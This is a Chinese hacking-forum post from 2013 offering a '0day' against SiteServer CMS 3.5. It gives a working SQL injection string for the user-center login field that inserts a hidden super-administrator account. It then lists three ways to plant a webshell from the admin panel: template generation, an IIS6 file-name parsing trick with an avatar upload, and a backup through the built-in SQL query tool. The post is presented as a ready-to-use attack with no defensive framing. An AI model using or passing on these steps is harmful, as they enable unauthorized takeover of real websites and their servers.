找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 SiteServer CMS 0Day
返回列表 发新帖
查看: 2668|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版! A7 O8 G9 a' c
# C& j: N* ^0 M1 j# R9 S
stieserver官网:www.siteserver.cn" L$ H9 {( n9 F* S5 U4 d1 j

/ G# S  }6 n/ s# F ) ^3 v2 \: @& }2 `6 Q& Y' L% f1 f

# h9 w7 a. A% v8 e; I, mEXP:
' i1 v; R9 T5 f( j) K( T7 v* S
( H9 M0 L6 l, X9 \直接访问UserCenter/login.aspx. G. w+ d, k/ D% w, a  f0 v$ A" w
7 q7 K8 d8 N- r3 t/ I

0 H: m: ]0 @1 \0 x& w, S
, }- ?% V9 |7 B$ o2 G用户名处输入:
- [" E: ?' v' s4 }$ d- M( O: n  A$ X3 s4 x7 G" _" |/ w% \2 f
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--  q6 Z! x! k+ Q9 J
2 Q3 {$ `4 ]* g: L* j+ Y! L

' t3 T$ \8 b+ g0 B" z9 O! R2 M3 N- P( ]; G
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。! Z0 c( P( \! e8 z3 [4 Q. H

9 E% z) [+ Y5 U4 Q + [; W5 h" W4 K& q9 h& O

( {$ s/ |5 I8 [- ^$ |之后再访问后台SiteServer/login.aspx用插入的用户登陆$ o4 f6 Q% T; Z, p
, N0 Z! T# L! V2 l
8 x7 @( f7 r) G3 d' t
; B: V  Q% @8 d+ ?. E
后台拿webshell的三种方法:# T+ F# E1 t3 N5 z0 y! Z

" Y8 `+ [3 G: Y8 |1 n5 @4 O  O一、
! y" q) g1 J7 F/ y% `! _! C
( f! o0 F# O* s5 ]9 A9 X站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx& I- U* a' n' j/ B7 S: _/ p

6 l% o: q: F5 V) Y$ ]+ z& e4 I; d二、8 l9 b. {/ u+ B4 T4 f& g& |
2 h! w( D+ V' ?" _; t& ]
成员权限-》添加用户-》用户名为:1.asp; u! }( ~( `) X1 M( h$ q6 p2 g6 l0 C

; @% V8 r1 o) l1 @% L( e. bhttp://127.0.0.1/usercenter/( Y$ @/ H, Q3 F8 {% H, m
( O* K) i8 Y2 I: |& S7 B, S9 @( S
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
, l7 `1 j, L" Y. u$ h  W$ e" n3 b8 C5 a" n
(ps:后台添加用户时不会验证是否含有非法字符), C& r) H) r8 x( [7 j2 t; L! ^+ W
" y# h9 O( G: p* k$ C7 j! [* V
三、& L7 R' j3 Q: J$ Q2 T$ Y- N- J
! I" H( [- x: z, O4 S
系统工具-》实用工具-》机器参数查看( p$ c7 @+ \( Q" P! `2 I/ p
可以看到数据库类型、名称,WEB路径2 |  M+ k" V. e( C# X5 r% {  W  K
( k- H/ P) E5 K8 \
系统工具-》数据库工具-》SQL语句查询! |& ?" }  Z- L, Z
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。% o& W' P7 }1 h6 k, l( N& B

+ ?+ o! m( C# N9 q3 l2 C0 E6 V
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表